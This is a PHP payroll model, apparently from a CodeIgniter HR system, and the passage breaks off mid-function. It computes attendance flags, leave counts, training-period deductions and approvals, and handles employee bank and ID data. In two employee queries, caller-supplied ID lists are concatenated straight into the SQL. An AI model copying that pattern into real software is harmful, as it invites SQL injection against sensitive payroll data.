<?php

use PhpOffice\PhpSpreadsheet\Cell\DataType;
use PhpOffice\PhpSpreadsheet\Shared\Date;
use PhpOffice\PhpSpreadsheet\Spreadsheet;
use PhpOffice\PhpSpreadsheet\Style\Alignment;
use PhpOffice\PhpSpreadsheet\Style\Border;
use PhpOffice\PhpSpreadsheet\Style\Fill;
use PhpOffice\PhpSpreadsheet\Style\NumberFormat;
use PhpOffice\PhpSpreadsheet\Worksheet\Worksheet;
use PhpOffice\PhpSpreadsheet\Writer\Xlsx;
use PhpOffice\PhpWord\TemplateProcessor;

class Payroll_model extends CI_Model
{
    public $template_file = APPPATH . 'modules/payroll/assets/templates/letter-generation-page.docx';
    public $save_path = WRITEPATH . 'payroll/';
    private $cron = false;

    public function get($id, $budget = false)
    {
        if (!$budget) {
            $this->db->where('type', 'payroll');
        }
        return $this->db->select('payroll.*, divisions.name as division')
            ->where('payroll.id', $id)
            ->join('divisions', 'payroll.division_id=divisions.id', 'left')
            ->get('payroll')->row();
    }
    public function exists($month, $year, $division_id)
    {
        return $this->db
            ->where(['month' => $month, 'year' => $year, 'division_id' => $division_id, 'type' => 'payroll'])
            ->count_all_results('payroll');
    }
    public function get_payroll_employees($payroll_id, $active = true, $all = false, $include_under_training = false)
    {
        $sp = 'CALL ';
        if ($all) {
            $sp .= 'get_payroll_all_employees(?);';
        } elseif ($active) {
            $sp .= 'get_payroll_active_employees(?);';
        } elseif (!$active) {
            $sp .= 'get_payroll_inactive_employees(?);';
        }
        $recs = $this->db->query(
            $sp,
            [$payroll_id]
        )->result();
        $this->db->next_result();
        if(!$include_under_training) {
            $recs = array_filter($recs, function ($rec) {
                return !$rec->under_training;
            });
        }
        return array_map(function ($employee) use ($all) {
            $employee = decrypt_employee_data($employee, [], $all, 'payroll_employee');
            $employee->actual_presents = $this->get_paid_days($employee);
            $employee->actual_absents = $employee->ncns + $employee->unpaid_leaves;
            $employee->arrears = $employee->arrears ?? 0;
            $employee->advances = $employee->advances ?? 0;
            $employee->incentives = $employee->incentives ?? 0;
            $employee->ncns_penalty = $employee->ncns_penalty ?? 0;
            $employee->others = $employee->others ?? 0;
            $employee->income_tax = 0;
            return $employee;
        }, $recs);
    }
    public function get_payroll_employee($payroll_id, $employee_id, $cron = false)
    {
        $sp = 'CALL get_payroll_employee(?,?);';
        $employee = $this->db->query(
            $sp,
            [$payroll_id, $employee_id]
        )->result();
        $this->db->next_result();
        $employee = decrypt_employee_data($employee, [], $cron, 'payroll_employee');
        $employee->actual_presents = $this->get_paid_days($employee);
        $employee->actual_absents = $employee->ncns + $employee->unpaid_leaves;
        $employee->arrears = $employee->arrears ?? 0;
        $employee->advances = $employee->advances ?? 0;
        $employee->incentives = $employee->incentives ?? 0;
        $employee->ncns_penalty = $employee->ncns_penalty ?? 0;
        $employee->others = $employee->others ?? 0;
        $employee->income_tax = 0;
        return $employee;
    }
    public function get_payroll_attendance($payroll_id, $employee_ids = [])
    {
        $this->db->where('payroll_id', $payroll_id);
        if ($employee_ids) {
            $this->db->where_in('employee_id', $employee_ids);
        }
        $recs = $this->db->order_by('day', 'asc')->get('payroll_attendance')->result();
        $data = [];
        foreach ($recs as $rec) {
            if (!isset($data['e_' . $rec->employee_id])) {
                $data['e_' . $rec->employee_id] = [];
            }
            $data['e_' . $rec->employee_id][$rec->day] = $rec->flag;
        }
        return $data;
    }
    public function get_payroll_leaves($payroll_id, $employee_ids = [])
    {
        $this->db->select('employee_id, year, jan, feb, mar, apr, may, jun, jul, aug, sep, oct, nov, dec')
            ->where(['payroll_id' => $payroll_id, 'special' => 0]);
        if ($employee_ids) {
            $this->db->where_in('employee_id', $employee_ids);
        }
        $recs = $this->db->order_by('employee_id', 'asc')->get('payroll_used_leaves')->result_array();
        $data = [];
        foreach ($recs as $rec) {
            if (!isset($data['e_' . $rec['employee_id']])) {
                $data['e_' . $rec['employee_id']] = [];
            }
            $new_rec = [];
            foreach ($rec as $field => $field_value) {
                if (in_array($field, ['year', 'employee_id'])) {
                    continue;
                }
                $new_rec[$field . '-' . $rec['year']] = $field_value;
            }
            $data['e_' . $rec['employee_id']] = array_merge($data['e_' . $rec['employee_id']], $new_rec);
        }
        return $data;
    }
    public function get_payroll_special_leaves($payroll_id, $employee_ids = [])
    {
        $this->db->select('employee_id, year, jan, feb, mar, apr, may, jun, jul, aug, sep, oct, nov, dec')
            ->where(['payroll_id' => $payroll_id, 'special' => 1]);
        if ($employee_ids) {
            $this->db->where_in('employee_id', $employee_ids);
        }
        $recs = $this->db->order_by('employee_id', 'asc')->get('payroll_used_leaves')->result_array();
        $data = [];
        foreach ($recs as $rec) {
            if (!isset($data['e_' . $rec['employee_id']])) {
                $data['e_' . $rec['employee_id']] = [];
            }
            $new_rec = [];
            foreach ($rec as $field => $field_value) {
                if (in_array($field, ['year', 'employee_id'])) {
                    continue;
                }
                $new_rec[$field . '-' . $rec['year']] = $field_value;
            }
            $data['e_' . $rec['employee_id']] = array_merge($data['e_' . $rec['employee_id']], $new_rec);
        }
        return $data;
    }
    public function queue_payroll($month, $year, $division_id)
    {
        $month_interval = month_first_last_day(date('m', strtotime($month)), $year);
        $this->db->trans_start();
        $this->db->insert('payroll', [
            'month' => $month,
            'year' => $year,
            'start' => $month_interval['first'],
            'end' => $month_interval['last'],
            'division_id' => $division_id,
            'created_at' => date('Y-m-d H:i:s'),
            'updated_at' => date('Y-m-d H:i:s'),
        ]);
        $id = $this->db->insert_id();
        $this->activity
            ->set_division($division_id)
            ->set_payroll($id)
            ->log('payroll_added');
        $this->db->trans_complete();
        return $this->db->trans_status();
    }
    public function regenerate($id)
    {
        $this->db->trans_start();
        $this->db->where(['id' => $id, 'cfo_status <>' => 'approved'])->update('payroll', [
            'processed' => 'queued',
            'updated_at' => date('Y-m-d H:i:s'),
        ]);
        $payroll_rec = $this->db->select('type, division_id')->where('id', $id)->get('payroll')->row();
        if ($payroll_rec->type == 'payroll') {
            $this->activity
                ->set_division($payroll_rec->division_id)
                ->set_payroll($id)
                ->log('payroll_regenerated');
        } else {
            $this->activity
                ->set_division($payroll_rec->division_id)
                ->set_payroll($id)
                ->log('payroll_regenerated');
        }
        $this->db->trans_complete();
        return $this->db->trans_status();
    }
    public function approve($id, $type = 'hr')
    {
        $this->db->trans_start();
        $data = [
            'updated_at' => date('Y-m-d H:i:s'),
        ];
        if ($type == 'hr') {
            $data['hr_status'] = 'approved';
            $data['cfo_status'] = 'pending';
            $data['hr_approver'] = $this->session->userdata('id');
        }
        if ($type == 'cfo') {
            $data['cfo_status'] = 'approved';
            $data['cfo_approver'] = $this->session->userdata('id');
        }
        if ($this->db->where(['id' => $id, 'type' => 'payroll'])->update('payroll', $data) && $type == 'cfo') {
            $employees = $this->get_payroll_employees($id, true, true);
            foreach ($employees as $employee) {
                if ($employee->under_training) {
                    continue;
                }
                if (empty(trim($employee->account_number)) || empty(trim(@$employee->account_iban))) {
                    $this->db->insert('payroll_adjustments', [
                        'payroll_id' => $id,
                        'employee_id' => $employee->employee_id,
                        'column' => 'others',
                        'value' => 290,
                        'type' => 'system',
                        'reason' => 'Auto deducted: 290 for payorder on absence of bank account number',
                        'user_id' => 0,
                        'user_name' => 'HRM PAYROLL SYSTEM',
                        'updated_at' => date('Y-m-d H:i:s'),
                    ]);
                    $this->db->insert('payroll_payorders', [
                        'payroll_id' => $id,
                        'employee_id' => $employee->employee_id,
                        'account_title' => $employee->account_title,
                    ]);
                } else {
                    $this->db->insert('payroll_payslips', [
                        'payroll_id' => $id,
                        'employee_id' => $employee->employee_id,
                    ]);
                }
            }
        }
        $payroll_rec = $this->db->select('division_id, month, year')->where('id', $id)->get('payroll')->row();
        $division_rec = $this->db->select('*')->where('id', $payroll_rec->division_id)->get('divisions')->row();
        $file_name = preg_replace('#\_{2,}#is', '_', sprintf('Payroll_%s_%s, %s', preg_replace('#[^\d\w]#is', '_', $division_rec->name), ucfirst($payroll_rec->month), $payroll_rec->year));
        $file = $this->save_excel($id, $file_name);
        $this->template_mail
            ->send_to_department(
                $payroll_rec->division_id,
                $type == 'cfo' ? 'hr' : 'cfo',
                sprintf('[%s] Payroll for %s %s period is approved by %s', $division_rec->name, ucfirst($payroll_rec->month), $payroll_rec->year, $type == 'cfo' ? 'CFO' : 'HR'),
                $this->load->view(
                    $type == 'hr' ? 'email/hr_approval' : 'email/payroll_action',
                    [
                        'month' => ucfirst($payroll_rec->month),
                        'year' => $payroll_rec->year,
                        'action' => 'approved',
                        'actor' => $type == 'cfo' ? 'CFO' : 'HR',
                        'url' => base_url('payroll/approved'),
                    ],
                    true
                ),
                [],
                [],
                true,
                [$file_name => $file],
                true
            );
        $this->notify
            ->department(['hr', 'cfo'])
            ->send(
                sprintf('[%s] Payroll for %s %s period is approved by %s', $division_rec->name, ucfirst($payroll_rec->month), $payroll_rec->year, $type == 'cfo' ? 'CFO' : 'HR'),
                'payroll/pending'
            );
        $this->activity
            ->set_division($payroll_rec->division_id)
            ->set_payroll($id)
            ->log([
                'payroll_approved',
                $type == 'hr' ? 'HR' : 'CFO',
            ]);
        $this->db->trans_complete();
        return $this->db->trans_status();
    }
    public function amend($id, $reason, $rows = [])
    {
        $this->db->trans_start();
        $this->db
            ->where(['payroll_id' => $id])
            ->update('payroll_employee', [
                'highlighted' => 0,
            ]);
        $this->db->insert('payroll_comments', [
            'payroll_id' => $id,
            'comments' => htmlspecialchars($reason),
            'user_id' => $this->session->userdata('id'),
            'added_at' => date('Y-m-d H:i:s'),
        ]);
        $this->db->where(['type' => 'payroll', 'id' => $id])->update('payroll', [
            'hr_status' => 'pending',
            'cfo_status' => 'amendments-required',
            'updated_at' => date('Y-m-d H:i:s'),
        ]);
        if ($rows) {
            $this->db
                ->where(['payroll_id' => $id])
                ->where_in('employee_id', $rows)
                ->update('payroll_employee', [
                    'highlighted' => 1,
                ]);
        }
        $payroll_rec = $this->db->select('division_id, month, year')->where('id', $id)->get('payroll')->row();
        $division_rec = $this->db->select('*')->where('id', $payroll_rec->division_id)->get('divisions')->row();
        $this->template_mail
            ->send_to_department(
                $payroll_rec->division_id,
                'hr',
                sprintf('[%s] Amendments are requested on payroll for %s %s period by %s', $division_rec->name, ucfirst($payroll_rec->month), $payroll_rec->year, 'CFO'),
                $this->load->view(
                    'email/payroll_amend',
                    [
                        'month' => ucfirst($payroll_rec->month),
                        'year' => $payroll_rec->year,
                        'action' => 'approved',
                        'reason' => htmlspecialchars($reason),
                        'url' => base_url('payroll/pending'),
                    ],
                    true
                ),
                [],
                [],
                true
            );
        $this->notify
            ->department(['hr', 'cfo'])
            ->send(
                sprintf('[%s] Amendments are requested on payroll for %s %s period by %s<br>Reason: %s', $division_rec->name, ucfirst($payroll_rec->month), $payroll_rec->year, 'CFO', htmlspecialchars($reason)),
                'payroll/pending'
            );
        $this->activity
            ->set_division($payroll_rec->division_id)
            ->set_payroll($id)
            ->log([
                'payroll_amend',
                htmlspecialchars($reason),
            ]);
        $this->db->trans_complete();
        return $this->db->trans_status();
    }
    public function generate_payroll($payroll_id, $cron = false)
    {
        $this->cron = $cron;
        $this->load->model('payroll/tax_model');
        $this->db->trans_start();
        $payroll = $this->db->where('id', $payroll_id)->get('payroll')->row();
        if (!$payroll) {
            return false;
        }
        $this->db->where('payroll_id', $payroll_id)->delete('payroll_attendance');
        $this->db->where('payroll_id', $payroll_id)->delete('payroll_employee');
        $this->db->where('payroll_id', $payroll_id)->delete('payroll_used_leaves');
        $this->db->where(['payroll_id' => $payroll_id, 'type' => 'system'])->delete('payroll_adjustments');
        $this->db->where('payroll_id', $payroll_id)->delete('payroll_payorders');
        $this->db->where('payroll_id', $payroll_id)->delete('payroll_payslips');
        /**
         * Active Employees
         */
        $employees = $this->get_active_employees($payroll->division_id, $payroll->start, $payroll->end, $cron);
        foreach ($employees as $employee) {
            $this->db->insert('payroll_employee', encrypt_employee_data([
                'payroll_id' => $payroll_id,
                'employee_id' => $employee->employee_id,
                'hrm_id' => $employee->hrm_id,
                'name' => sprintf('%s %s', $employee->first_name, $employee->last_name),
                'cnic' => $employee->cnic ?? '',
                'center' => $employee->city ?? '',
                'dob' => $employee->dob ?? '',
                'hire_date' => $employee->hire_date,
                'duty_type' => $employee->duty_type,
                'position' => $employee->position ?? '',
                'department' => $employee->department ?? '',
                'project' => $employee->primary_project ?? '',
                'leave_quota' => $this->get_leave_quota($employee->employee_id, $payroll->end),
                'actual_gross_salary' => $_gross_actual = $employee->current_salary ?? 0,
                'actual_basic_salary' => $basic_salary = percentage_to_amount($_gross_actual, 68),
                'gross_salary' => $_gross_actual,
                'basic_salary' => $basic_salary,
                'income_tax' => 0,
                'eobi' => ($employee->eobi_check == 1 ? calculate_eobi($employee->eobi ?? 0, $employee->hire_date, $payroll->end, $employee->training_period) : 0),
                'provident_fund' => ($employee->duty_type != 5 && $employee->provident_fund_check == 1) ? percentage_to_amount($basic_salary ?? 0, 9.3) : 0,
                'account_title' => $employee->account_title ?? '',
                'account_number' => $employee->account_number ?? '',
                'account_iban' => @$employee->account_iban ?? '',
                'branch_address' => $employee->branch_address ?? '',
                'branch_code' => $employee->branch_code ?? '',
            ], [], 'payroll_employee'));

            $this->generate_payroll_attendance($employee, $payroll_id, $payroll->start, $payroll->end);
            $this->generate_used_leaves($payroll_id, $employee->employee_id, $payroll->year);
            $this->generate_used_special_leaves($payroll_id, $employee->employee_id, $payroll->year);
        }

        /**
         * Non-active employees
         */
        $employees = $this->get_nonactive_employees($payroll->division_id, $payroll->start, $payroll->end, $cron);
        foreach ($employees as $employee) {
            $this->db->insert('payroll_employee', encrypt_employee_data([
                'payroll_id' => $payroll_id,
                'employee_id' => $employee->employee_id,
                'status' => $employee->status == 'terminated' ? 'terminated' : 'resigned',
                'hrm_id' => $employee->hrm_id,
                'name' => sprintf('%s %s', $employee->first_name, $employee->last_name),
                'cnic' => $employee->cnic ?? '',
                'center' => $employee->city ?? '',
                'dob' => $employee->dob ?? '',
                'hire_date' => $employee->hire_date,
                'duty_type' => $employee->duty_type,
                'position' => $employee->position ?? '',
                'department' => $employee->department ?? '',
                'project' => $employee->primary_project ?? '',
                'leave_quota' => $this->get_leave_quota($employee->employee_id, $payroll->end),
                'actual_gross_salary' => $_gross_actual = $employee->current_salary ?? 0,
                'actual_basic_salary' => $_basic_actual = percentage_to_amount($_gross_actual, 68),
                'gross_salary' => $_gross_actual,
                'basic_salary' => $_basic_actual,
                'income_tax' => 0,
                'eobi' => ($employee->eobi_check == 1 ? calculate_eobi($employee->eobi ?? 0, highest_date($employee->hire_date, $payroll->start, $employee->training_period), $employee->termination_date) : 0),
                'provident_fund' => 0,
                'account_title' => $employee->account_title ?? '',
                'account_number' => $employee->account_number ?? '',
                'account_iban' => @$employee->account_iban ?? '',
                'branch_address' => $employee->branch_address ?? '',
                'branch_code' => $employee->branch_code ?? '',
            ], [], 'payroll_employee'));

            $this->generate_payroll_attendance($employee, $payroll_id, $payroll->start, $payroll->end);
            $this->generate_used_leaves($payroll_id, $employee->employee_id, $payroll->year);
            $this->generate_used_special_leaves($payroll_id, $employee->employee_id, $payroll->year);
        }
        $this->db->where('id', $payroll_id)->update('payroll', [
            'updated_at' => date('Y-m-d H:i:s'),
        ]);
        $this->db->trans_complete();
        $payroll_gen_status = $this->db->trans_status();
        if ($payroll_gen_status) {
            $employees = $this->get_payroll_employees($payroll->id, false, true, true);
            $employees = array_filter($employees, function ($emp) {
                return $emp->under_training;
            });
            if (count($employees) > 0) {
                $this->db->trans_start();
                foreach ($employees as $employee) {
                    $this->add_carry_salary($employee, $payroll_id, $payroll->start, $payroll->end);
                }
                $this->db->trans_complete();
                $payroll_gen_status = $payroll_gen_status && $this->db->trans_status();
            }
        }
        return $payroll_gen_status;
    }
    public function generate_payroll_attendance($employee, $payroll_id, $start, $end)
    {
        $days_range = date_range($start, $end, '+1 day', 'Y-m-d');
        $weekends = $this->get_weekends();
        $holidays = $this->get_holidays($start, $end);
        $attendance = $this->get_attendance($employee->employee_id, $start, $end);
        $suspensions = $this->get_suspensions($employee->employee_id, $start, $end);
        $leaves = $this->get_leaves($employee->employee_id, $start, $end);
        $special_leaves = $this->get_special_leaves($employee->employee_id, $start, $end);
        $penalties = $this->get_penalties($employee->employee_id, $start, $end);

        $carry_training_amount = $this->db->where(['employee_id' => $employee->employee_id, 'effective_date' => $start])->get('under_training_amounts')->row();
        if ($carry_training_amount) {
            $carry_training_amount = decrypt_employee_data($carry_training_amount, [], $this->cron, 'under_training_amounts');
            $this->db->insert('payroll_adjustments', [
                'payroll_id' => $payroll_id,
                'employee_id' => $employee->employee_id,
                'column' => 'arrears',
                'value' => $carry_training_amount->amount,
                'type' => 'system',
                'reason' => 'Under training amount from last month',
                'user_id' => 0,
                'user_name' => 'HRM PAYROLL SYSTEM',
                'updated_at' => date('Y-m-d H:i:s'),
            ]);
        }
        if ($penalties) {
            foreach ($penalties as $penalty) {
                if ($penalty->amount == 0) {
                    continue;
                }
                if ($penalty->amount > 0) {
                    $this->db->where(['payroll_id' => $payroll_id, 'employee_id' => $employee->employee_id])->update('payroll_employee', [
                        'incentives_changed' => 1,
                    ]);
                    $this->db->insert('payroll_adjustments', [
                        'payroll_id' => $payroll_id,
                        'employee_id' => $employee->employee_id,
                        'column' => 'incentives',
                        'value' => $penalty->amount,
                        'type' => 'system',
                        'reason' => $penalty->title . ' - ' . $penalty->genID,
                        'user_id' => 0,
                        'user_name' => 'HRM PAYROLL SYSTEM',
                        'updated_at' => date('Y-m-d H:i:s'),
                    ]);
                } else {
                    $this->db->insert('payroll_adjustments', [
                        'payroll_id' => $payroll_id,
                        'employee_id' => $employee->employee_id,
                        'column' => 'others',
                        'value' => abs($penalty->amount),
                        'type' => 'system',
                        'reason' => $penalty->title . ' - ' . $penalty->genID,
                        'user_id' => 0,
                        'user_name' => 'HRM PAYROLL SYSTEM',
                        'updated_at' => date('Y-m-d H:i:s'),
                    ]);

                }
            }
        }

        $count_presents = 0;
        $count_paid_leaves = 0;
        $count_special_leaves = 0;
        $count_unpaid_leaves = 0;
        $count_suspensions = 0;
        $count_ncns = 0;
        $count_late = 0;
        $count_offs = 0;
        $count_half_days = 0;
        $count_unpaid_half_days = 0;

        $hire_date = new DateTime($employee->hire_date);
        $actual_tenure = $tenure = $hire_date->diff(new DateTime(end($days_range)))->format('%a');
        reset($days_range);

        $absent_15_tenure_penalty_deducted = false;
        foreach ($days_range as $day) {
            if ($employee->hire_date && strtotime($day) < strtotime($employee->hire_date)) {
                continue;
            }
            if ($employee->termination_date && strtotime($day) >= strtotime($employee->termination_date)) {
                $this->db->insert('payroll_attendance', [
                    'payroll_id' => $payroll_id,
                    'employee_id' => $employee->employee_id,
                    'day' => $day,
                    'flag' => $this->get_absent_flag_by_status($employee->status, $day, $employee->termination_date),
                ]);
                continue;
            }
            if ($tenure <= ($employee->training_period + 60)) {
                $tenure = $hire_date->diff(new DateTime($day))->format('%a');
            }

            $flag = null;
            if (isset($suspensions[$day])) {
                $flag = 'sus';
                $count_suspensions++;
            } elseif (isset($holidays[$day]) && in_array($employee->shift, $holidays[$day])) {
                $flag = 'off';
                $count_offs++;
            } elseif (in_array(date('l', strtotime($day)), $weekends[$employee->shift] ?? $weekends[0])) {
                $flag = 'off';
                $count_offs++;
            } elseif (isset($special_leaves[$day]) && $special_leaves[$day] == 'full_day') {
                $flag = 'pl';
                $count_special_leaves++;
            } elseif (isset($special_leaves[$day]) && $special_leaves[$day] == 'half_day') {
                if (isset($attendance[$day]) && (in_array('FD', $attendance[$day]) || in_array('OT', $attendance[$day]) || in_array('UH-D', $attendance[$day]))) {
                    $flag = 'h-d';
                    $count_half_days += 0.5;
                    $count_special_leaves += 0.5;
                } else {
                    $flag = 'hpl';
                    $count_unpaid_leaves += 0.5;
                    $count_unpaid_half_days += 0.5;
                }
            } elseif (isset($leaves[$day]) && $leaves[$day] == 'full_day') {
                $flag = 'pl';
                $count_paid_leaves++;
            } elseif (isset($leaves[$day]) && $leaves[$day] == 'half_day') {
                if (isset($attendance[$day]) && (in_array('FD', $attendance[$day]) || in_array('OT', $attendance[$day]) || in_array('UH-D', $attendance[$day]))) {
                    $flag = 'h-d';
                    $count_half_days += 0.5;
                    $count_paid_leaves += 0.5;
                } else {
                    $flag = 'hpl';
                    $count_unpaid_leaves += 0.5;
                    $count_unpaid_half_days += 0.5;
                }
            } elseif (isset($attendance[$day])) {
                if (in_array('FD', $attendance[$day]) || in_array('OT', $attendance[$day])) {
                    $count_presents++;
                    $flag = 'p';
                } elseif (in_array('UH-D', $attendance[$day])) {
                    $count_unpaid_leaves += 0.5;
                    $count_unpaid_half_days += 0.5;
                    $flag = 'uh-d';
                } elseif (in_array('A', $attendance[$day])) {
                    $count_ncns++;
                    $flag = 'a';
                } elseif (in_array('P', $attendance[$day])) {
                    $count_presents++;
                    $flag = 'p';
                } elseif (in_array('LA', $attendance[$day])) {
                    $count_late++;
                    $flag = 'la';
                } else {
                    $count_ncns++;
                    $flag = 'a';
                }
                if ($flag == 'p' && in_array('LA', $attendance[$day])) {
                    $count_presents--;
                    $count_late++;
                    $flag = 'la';
                }
            } else {
                $flag = 'a';
                $count_ncns++;
            }
            if ($employee->training_period > 0 && $tenure == ($employee->training_period + 1) && !$absent_15_tenure_penalty_deducted) {
                $last_training_day = date('Y-m-d', strtotime($day . ' -1 day'));

                $fifteen_days_attendance = $this->get_attendance_flag_in_period(
                    $employee->employee_id,
                    $employee->hire_date,
                    $last_training_day,
                    $employee->shift,
                    $employee->status,
                    $employee->hire_date,
                    $employee->termination_date
                );
                if (in_array('a', $fifteen_days_attendance)) {
                    $day_salary = $employee->current_salary / count($days_range);
                    $day_15_salary = round($day_salary * getWeekdayDifference($employee->shift, $employee->hire_date, $last_training_day));
                    $this->db->insert('payroll_adjustments', [
                        'payroll_id' => $payroll_id,
                        'employee_id' => $employee->employee_id,
                        'column' => 'others',
                        'value' => $day_15_salary,
                        'type' => 'system',
                        'reason' => sprintf('Auto deducted %s days (%s - %s) of salary for absence within training period of %s days.', $employee->training_period, formatted_date($employee->hire_date), formatted_date($last_training_day), $employee->training_period),
                        'user_id' => 0,
                        'user_name' => 'HRM PAYROLL SYSTEM',
                        'updated_at' => date('Y-m-d H:i:s'),
                    ]);
                    $absent_15_tenure_penalty_deducted = true;
                }
            }
            $this->db->insert('payroll_attendance', [
                'payroll_id' => $payroll_id,
                'employee_id' => $employee->employee_id,
                'day' => $day,
                'flag' => $flag,
            ]);
        }
        $this->db->where(['payroll_id' => $payroll_id, 'employee_id' => $employee->employee_id])->update('payroll_employee', [
            'presents' => $count_presents,
            'paid_leaves' => $count_paid_leaves,
            'special_leaves' => $count_special_leaves,
            'offs' => $count_offs,
            'ncns' => $count_ncns,
            'suspensions' => $count_suspensions,
            'late_arrivals' => $count_late,
            'unpaid_leaves' => $count_unpaid_leaves,
            'half_days' => $count_half_days,
            'unpaid_half_days' => $count_unpaid_half_days,
            'under_training' => ($employee->training_period > 0 && $actual_tenure < $employee->training_period) ? 1 : 0,
        ]);
    }
    public function get_attendance_flag_in_period($employee_id, $start, $end, $shift, $status, $hire_date, $termination_date)
    {
        $days_range = date_range($start, $end, '+1 day', 'Y-m-d');
        $weekends = $this->get_weekends();
        $holidays = $this->get_holidays($start, $end);
        $attendance = $this->get_attendance($employee_id, $start, $end);
        $suspensions = $this->get_suspensions($employee_id, $start, $end);
        $leaves = $this->get_leaves($employee_id, $start, $end);
        $special_leaves = $this->get_special_leaves($employee_id, $start, $end);

        $flags = [];
        foreach ($days_range as $day) {
            if ($hire_date && strtotime($day) < strtotime($hire_date)) {
                continue;
            }
            if ($termination_date && strtotime($day) >= strtotime($termination_date)) {
                continue;
            }

            $flag = null;
            if (isset($suspensions[$day])) {
                $flag = 'sus';
            } elseif (isset($holidays[$day]) && in_array($shift, $holidays[$day])) {
                $flag = 'off';
            } elseif (in_array(date('l', strtotime($day)), $weekends[$shift] ?? $weekends[0])) {
                $flag = 'off';
            } elseif (isset($special_leaves[$day]) && $special_leaves[$day] == 'full_day') {
                $flag = 'pl';
            } elseif (isset($special_leaves[$day]) && $special_leaves[$day] == 'half_day') {
                $flag = 'h-d';
            } elseif (isset($leaves[$day]) && $leaves[$day] == 'full_day') {
                $flag = 'pl';
            } elseif (isset($leaves[$day]) && $leaves[$day] == 'half_day') {
                $flag = 'h-d';
            } elseif (isset($attendance[$day])) {
                if (in_array('FD', $attendance[$day]) || in_array('OT', $attendance[$day])) {
                    $flag = 'p';
                } elseif (in_array('UH-D', $attendance[$day])) {
                    $flag = 'uh-d';
                } elseif (in_array('A', $attendance[$day])) {
                    $flag = 'a';
                } elseif (in_array('P', $attendance[$day])) {
                    $flag = 'p';
                } elseif (in_array('LA', $attendance[$day])) {
                    $flag = 'la';
                } else {
                    $flag = 'a';
                }
                if ($flag == 'p' && in_array('LA', $attendance[$day])) {
                    $flag = 'la';
                }
            } else {
                $flag = 'a';
            }
            $flags[] = $flag;
        }
        return $flags;
    }
    public function generate_used_leaves($payroll_id, $employee_id, $year)
    {
        $data = [
            'payroll_id' => $payroll_id,
            'employee_id' => $employee_id,
            'year' => $year,
            'jan' => 0,
            'feb' => 0,
            'mar' => 0,
            'apr' => 0,
            'may' => 0,
            'jun' => 0,
            'jul' => 0,
            'aug' => 0,
            'sep' => 0,
            'oct' => 0,
            'nov' => 0,
            'dec' => 0,
        ];
        $recs = $this->db->query(
            'CALL get_leave_in_range(?, ?, ?);',
            [$employee_id, $year . '-01-01', $year . '-12-31']
        )->result();
        $this->db->next_result();
        foreach ($recs as $rec) {
            $month_short = strtolower(date('M', strtotime($rec->day)));
            $data[$month_short] = $data[$month_short] + ($rec->TYPE == 'full_day' ? 1 : 0.5);
        }
        $this->db->insert('payroll_used_leaves', $data);
    }
    public function generate_used_special_leaves($payroll_id, $employee_id, $year)
    {
        $data = [
            'payroll_id' => $payroll_id,
            'employee_id' => $employee_id,
            'special' => 1,
            'year' => $year,
            'jan' => 0,
            'feb' => 0,
            'mar' => 0,
            'apr' => 0,
            'may' => 0,
            'jun' => 0,
            'jul' => 0,
            'aug' => 0,
            'sep' => 0,
            'oct' => 0,
            'nov' => 0,
            'dec' => 0,
        ];
        $recs = $this->db->query(
            'CALL get_special_leave_in_range(?, ?, ?);',
            [$employee_id, $year . '-01-01', $year . '-12-31']
        )->result();
        $this->db->next_result();
        foreach ($recs as $rec) {
            $month_short = strtolower(date('M', strtotime($rec->day)));
            $data[$month_short] = $data[$month_short] + ($rec->TYPE == 'full_day' ? 1 : 0.5);
        }
        $this->db->insert('payroll_used_leaves', $data);
    }
    public function get_active_employees($division_id, $start, $end, $cron = false, $employees = null, $departments = null)
    {
        $query = "SELECT
        `eh`.`employee_id`,
        `eh`.`hrm_id`,
        `eh`.`status`,
        `eh`.`first_name`,
        `eh`.`last_name`,
        `eh`.`cnic`,
        `dv`.`city`,
        `eh`.`dob`,
        `eh`.`hire_date`,
        `eh`.`duty_type`,
        `p`.`position_name` as `position`,
        `d`.`department_name` as `department`,
        `d`.`training_period`,
        `eh`.`primary_project`,
        `eh`.`current_salary`,
        `eh`.`rate`,
        `eh`.`shift`,
        `eh`.`eobi`,
        `eh`.`eobi_check`,
        `eh`.`provident_fund_check`,
        `eh`.`account_title`,
        `eh`.`account_number`,
        `eh`.`account_iban`,
        `eh`.`branch_address`,
        `eh`.`branch_code`
      FROM
        `employee_history` `eh`
        LEFT JOIN `position` `p` ON `eh`.`pos_id` = `p`.`pos_id`
        LEFT JOIN `department` `d` ON `eh`.`dept_id` = `d`.`dept_id`
        LEFT JOIN `divisions` `dv` ON `eh`.`division_id` = `dv`.`id`
      WHERE
        IFNULL(`d`.`include_in_payroll`, 1) = 1
        AND `division_id` = ?
        AND `hire_date` <= ?
        AND (
          DAYNAME(`termination_date`) IS NULL
          OR `termination_date` > ?
        )
        AND `status` IN (
          'active', 'released', 'terminated',
          'on-hold', 'resigned', 'resignation-received'
        )";
        if (!empty(trim($employees))) {
            $query .= " AND eh.employee_id IN ({$employees})";
        }
        if (!empty(trim($departments))) {
            $query .= " AND eh.dept_id IN ({$departments})";
        }
        $recs = $this->db->query($query, [
            $division_id, $end, $end,
        ])->result();
        return array_map(function ($rec) use ($cron, $start, $end) {
            $rec = decrypt_employee_data($rec, [], $cron);
            $rec->current_salary = calculate_gross_salary($rec->employee_id, $start, $end, $cron);
            return $rec;
        }, $recs);
    }
    public function get_nonactive_employees($division_id, $start, $end, $cron = false, $employees = null, $departments = null)
    {
        $query = "SELECT
        `eh`.`employee_id`,
        `eh`.`hrm_id`,
        `eh`.`status`,
        `eh`.`first_name`,
        `eh`.`last_name`,
        `eh`.`cnic`,
        `dv`.`city`,
        `eh`.`dob`,
        `eh`.`hire_date`,
        `eh`.`termination_date`,
        `eh`.`duty_type`,
        `p`.`position_name` AS `position`,
        `d`.`department_name` AS `department`,
        `d`.`training_period`,
        `eh`.`primary_project`,
        `eh`.`current_salary`,
        `eh`.`rate`,
        `eh`.`shift`,
        `eh`.`eobi`,
        `eh`.`eobi_check`,
        `eh`.`account_title`,
        `eh`.`account_number`,
        `eh`.`account_iban`,
        `eh`.`branch_address`,
        `eh`.`branch_code`
        FROM
            `employee_history` `eh`
        LEFT JOIN `position` `p` ON
            `eh`.`pos_id` = `p`.`pos_id`
        LEFT JOIN `department` `d` ON
            `eh`.`dept_id` = `d`.`dept_id`
        LEFT JOIN `divisions` `dv` ON
            `eh`.`division_id` = `dv`.`id`
        WHERE
        IFNULL(`d`.`include_in_payroll`, 1) = 1
        AND `status` <> 'not-joined'
        AND `division_id` = ? AND `hire_date` <= ? AND `termination_date` >= ? AND `termination_date` <= ?";
        if (!empty(trim($employees))) {
            $query .= " AND eh.employee_id IN ({$employees})";
        }
